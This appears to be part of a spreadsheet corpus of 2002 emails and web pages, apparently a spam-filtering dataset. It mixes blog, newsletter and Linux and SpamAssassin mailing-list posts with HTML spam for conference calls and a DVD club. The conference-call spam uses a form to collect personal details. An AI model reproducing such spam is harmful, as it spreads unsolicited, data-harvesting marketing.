 &lt;a name="When:10:23:59AM"&gt;&lt;a href="http://icann.blog.us/stories/2002/07/29/auerbachWinsCourtCriticize.html"&gt;Bret Fausett, yesterday&lt;/a&gt;: "It's hard to imagine a more complete win than what ICANN Director Karl Auerbach received today from Los Angeles Superior Court Judge Dzintra Janavs."&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:10:23:59AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:8:13:27AM"&gt;James Jarrett &lt;a href="http://radio.weblogs.com/0103655/2002/07/30.html"&gt;wonders&lt;/a&gt; where is his blog flow?&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:8:13:27AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:1:30:29PM"&gt;Mark Crane writes: "Woke up early the other morning, and started listening to a BBC special on the Silicon Valley. Suddenly I heard the voice of Dave Winer, and he sounded like this mellow California hippy-geek. You should do a DaveNet that is just a stream of you reading the essay.  Hearing the Dave voice totally changed my perceptions of the Dave Winer experience." &lt;i&gt;It's true, I have a pretty soft voice. I laugh a lot too. Many people are surprised. &lt;/i&gt;&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:1:30:29PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:6:54:10AM"&gt;&lt;a href="http://www.oreillynet.com/pub/a/network/2002/07/29/oscon.html"&gt;OSCON&lt;/a&gt;, last week, has done its job and stirred the embers of the Great Open Source Debate of the 1990s. I found myself writing in an email yesterday: "Very little really usable software has come from people who are willing to work for $0. (I chose my words carefully, infrastructure is another matter entirely.)  Further, it's weird to say, as Richard Stallman does, that by coercing programmers to work for $0 that that's freedom. To me it seems obvious that that's slavery." &amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:6:54:10AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:6:30:34AM"&gt;&lt;a href="http://www.washingtonpost.com/wp-dyn/articles/A12982-2002Jul28.html"&gt;Washington Post&lt;/a&gt;: "Operated for years by Internet addressing giant VeriSign Inc., dot-org is slated to get a new landlord in October when VeriSign relinquishes its hold on the domain."&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:6:30:34AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:7:42:33AM"&gt;&lt;a href="http://scriptingnews.userland.com/backIssues/2000/07/30#loopingAndLooping"&gt;Two years ago on this day&lt;/a&gt;: "The best standard is the one with the most users."&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:7:42:33AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="l5a1d02d33f1400cb5064ec0351abf914"&gt;Ponder &lt;a href="http://scriptingnews.userland.com/backissues/2002/07/29#warningSillyJoke"&gt;yesterday's riddle&lt;/a&gt;. Then click on the &lt;a href="http://radio.weblogs.com/0001015/images/2002/07/30/puzzlesolution.gif"&gt;solution&lt;/a&gt;. &lt;img src="http://static.userland.com/shortcuts/images/qbullets/sidesmiley.gif"&gt;&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#l5a1d02d33f1400cb5064ec0351abf914" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;&lt;/a&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/body&gt;
 	&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-10
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * This Week on perl5-porters (2-8 September 2002)
 +--------------------------------------------------------------------+
 | This Week on perl5-porters (2-8 September 2002)                    |
 |   posted by rafael on Monday September 09, @07:33 (summaries)      |
 |   http://use.perl.org/article.pl?sid=02/09/09/1147243              |
 +--------------------------------------------------------------------+
 As September begins, the perl5-porters, ignoring the changing weather,
 continue to work. This week, some small things, and a few bigger ones,
 are selected in the report. Read below.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/09/09/1147243
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/09/1147243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</si>
  <si>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'Bust' market closes two Powergen stations
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723998,215/
 Date: 2002-10-10T03:26:53+01:00
 *Business:* Powergen yesterday shut down a quarter of its generating capacity.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Multiple regular expression
</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for this help. I will change the score of
 FROM_AND_TO_SAME rule to be higher.
 Benoit Peccatte
 PS: I've noticed that the reply-to is not fixed to your mailing-list
 is this normal ?
 On Tue, 2002-08-06 at 16:22, Theo Van Dinter wrote:
 &gt; On Tue, Aug 06, 2002 at 03:29:30PM -0400, Benoit Peccatte wrote:
 &gt; &gt; I would like to add a rule to spamassassin to compare 2 header lines.
 &gt; &gt; By example match mails in which To: equals From:
 &gt; &gt; 
 &gt; &gt; I don't think it is possible with a single regular expression.
 &gt; &gt; Can I use one after one other ?
 &gt; &gt; Does anobody have an idea ?
 &gt; 
 &gt; You would have to make an Eval test that retrieves both header and
 &gt; compares them.
 &gt; 
 &gt; BTW:
 &gt; header FROM_AND_TO_SAME                eval:check_for_from_to_equivalence()
 &gt; describe FROM_AND_TO_SAME      From and To the same address
 &gt; 
 &gt; :)
 &gt; 
 &gt; -- 
 &gt; Randomly Generated Tagline:
 &gt; It really doesn't bother me if people want to use grep or map in a void
 &gt;  context.  It didn't bother me before there was a for modifier, and
 &gt;  now that there is one, it still doesn't bother me.  I'm just not very
 &gt;  easy to bother.
 &gt;               -- Larry Wall in &lt;199911012346.PAA25557@kiev.wall.org&gt;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</si>
  <si>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Hi,
 Matthew French:
 &gt; Declan Houlihan mentioned:
 &gt; &gt; We're actually investigating switching from Sparc/Solaris to
 &gt; &gt; Intel/Linux.
 Boo hisss *duck* :)
 &gt; Well, why not try Linux on Sparc. &lt;snip&gt;
 &gt;
 &gt; And you get a working version of your favourite KDE/Gnome desktop instead of
 &gt; DTE, uhm, I mean CDE.
 um.. http://wwws.sun.com/software/star/gnome/ integrated into solaris.
 Of course then there's http://wwws.sun.com/software/solaris/freeware/ for 
 solaris 9 which gives you afterstep and windowmaker among other stuff. My 
 personal favourite at the moment is enlightenment which also has Solaris 
 packages available for download.
 &gt; &gt; Basically the whole installation procedure is
 &gt; &gt; "boot net - install"
 &gt; Talking of which, you can install Sparc Linux using this technique as well.
 &gt; The image takes a while to load, but once this is done you can install in
 &gt; the normal fashion.
 Out of curiosity, does `normal fashion` mean that you still have to do the 
 interactive customisations or is it like Solaris jumpstart where you can 
 specify everything on the install server, do `boot net - install` go home, and 
 come in to a fully installed and patched desktop the next morning?
 &gt; There are minor problems: like the serial console drivers, but for workstation 
 &gt; installs I suspect it will work fine.
 I don't see why this should be a _major problem. The prom (ie the "ok" prompt) 
 is almost at the hardware level and hence dosent depend on the os so you 
 should be able to connect to that easily enough. Once the machine is installed 
 cant you just log in over the network? The network is the computer after all 
 (sorry couldn't resist!)
 valen@tuatha.org said:
 &gt; side, Sun's terminal handling leaves a lot to be desired - it won't
 &gt; work properly on a Wyse 120+ for instance, no matter what emulation
 &gt; mode the Wyse is trying to do.
 hmm... I'm not familiar with wyse stuff, but I only need to use the console 
 when something breaks, then anything capable of something basic like vt100 at 
 9600 8n1 seems to work  . Not sure why you'd need to worry about this much 
 really, just set up jumpstart to install automatically then you don't need to 
 look at the console at all.
 Cheers,
 ~Al
 -- 
 Expressed in this posting are my opinions.  They are in no way related
 to opinions held by my employer, Sun Microsystems.
 Statements on Sun products included here are not gospel and may
 be fiction rather than truth.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Crystal Clear Conference Calls
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Take Control Of Your Conference Calls&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DTimes, New Roman&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#000066 size=3D6&gt;Crystal Clear  
       Conference Calls&lt;BR&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#666600 size=3D5&gt;&lt;B&gt;(Anytime/Anywhere)&lt;/B&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#000066 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;International Dial In 18 cents per minute
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#666600 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;G=
 et the best 
       quality, the easiest to use, and lowest rate in the 
       industry.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000066 size=3D4&gt;If you like saving m=
 oney, fill 
       out the form below and one of our consultants will contact 
   you.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#000066 size=3D2&gt;Required Input Field&lt;FONT color=3D#66660=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks2_9@yahoo.com?subject=3DConference_Inqu=
 iry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif" color=3D=
 #666600
       size=3D1&gt;=FFFFFFA9 1999-2002 CCFL &lt;BR&gt; To be removed from our distri=
 bution lists, please  
       &lt;A href=3D"mailto:d_lete110@eudoramail.com?subject=3DRemove_Conferen=
 cing"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; Is the use of "trusted hardware" really worth it ?
 &gt;
 &gt; Answering that requires fairly complete knowledge of the business
 &gt; model. But, in all probability: no, it isn't usually worth it. So, it
 &gt; comes down to how difficult you want to make the cracker's job.
 &gt;
 &gt; &gt; Look at the DVDs.
 &gt;
 &gt; IIRC, CSS was cracked by reverse-engineering a software player; and
 &gt; one where the developers forgot to encrypt the decryption key at that.
 This make me wonder about the relative protection of smart cards.  They have 
 an internal procession unit around 4MHz.  Can we consider them as trusted 
 hardware ?  The ability to ship smart cards periodicaly uppon cashing of a 
 monthly subscription fee would not raise too much the cost of "renting" the 
 system.  Smart card do their own self encryption.  Can they be used to 
 decrypt data needed by the system ?  The input of the system could me mangled 
 and the would keep a reference of how long it was in service.
 This sounds really feasible but I may be totaly wrong.  I may also be wrong 
 about the safety of a smart card.  
 What do you think ?
 -- 
 Yannick Gingras
 Coder for OBB : Oceangoing Bared Bonanza
 http://OpenBeatBox.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Join &amp; Get 4 DVDs for 49 ea. (+shipping &amp; processing)! Details Inside...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"&gt;
 &lt;HTML&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;HEAD&gt;
 	&lt;TITLE&gt;chdvd.com from Columbia House&lt;/TITLE&gt;
 	&lt;META NAME="generator" CONTENT="BBEdit 5.1.1"&gt;
 &lt;/HEAD&gt;
 &lt;body leftmargin="10" topmargin="0" marginwidth="10" marginheight="0" bgcolor="#ffffff" link="#000000" vlink="#000000"&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td width="511"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/chdvd_header_new.gif" width="511" height="27" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--Dear Member--&gt;
 &lt;table cellpadding="10" cellspacing="0" border="0" width="500" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;The Columbia House DVD Club is the best way to build your DVD
 collection. Check out today's best sellers like Ocean's 11, Harry
 Potter and the Sorcerer's Stone, Gladiator and many more! Join now and
 you can...&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="500" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td width="5" rowspan="3"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td align="center" valign="bottom"&gt;&lt;BR&gt;&lt;font size="4" color="#cc0033" face="verdana, arial, sans-serif"&gt;&lt;B&gt;Get 4 DVDs for 49&amp;cent; each!&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="center" valign="top"&gt;
 &lt;font face="verdana, arial, sans-serif" color="#000000"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="-3" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;i&gt;shipping &amp;amp; processing only $1.99 per DVD&lt;/i&gt;&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="right" valign="bottom"&gt;&lt;font size="-3" face="verdana, arial, sans-serif"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;i&gt;Details&lt;/i&gt;&lt;/a&gt;&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--End Dear Member--&gt;
 &lt;!--Selection of the Month--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="232" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="5" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td align="right" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/left_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" align="center"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#ffffff"&gt;&lt;B&gt;SPOTLIGHT&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td align="left" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/right_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" width="1" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="491" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="1" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="5" align="left"&gt;
 	&lt;table cellpadding="0" cellspacing="0" border="0" width="501" bgcolor="#ffffff"&gt;
 	&lt;TR&gt;&lt;TD colspan="7"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="10" alt=""&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td width="15"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/69/026993_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="35"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/70/027035_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="35"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/52/025208_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffffff" width="491" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="501" bgcolor="#ffffff"&gt;
 &lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;B&gt;Ocean's 11&lt;/B&gt;&lt;/font&gt;&lt;/a&gt;&lt;BR&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;Starring &lt;B&gt;George Clooney, Brad Pitt, Matt Damon&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="64"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;B&gt;Harry Potter and the Sorcerer's Stone&lt;/B&gt;&lt;/font&gt;&lt;/a&gt;&lt;BR&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;Starring &lt;B&gt;Daniel Radcliffe, Rupert Grint, Emma Watson &lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="62"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;B&gt;Gladiator&lt;/B&gt;&lt;/font&gt;&lt;/a&gt;&lt;BR&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;Starring &lt;B&gt;Russell Crowe, Joaquin Phoenix&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="33"&gt;&amp;nbsp;&lt;/td&gt;&lt;/font&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;!--End Selection of the Month--&gt;
 &lt;!--New Releases--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#ffffff"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="227" height="1" alt=""&gt;&lt;/td&gt;
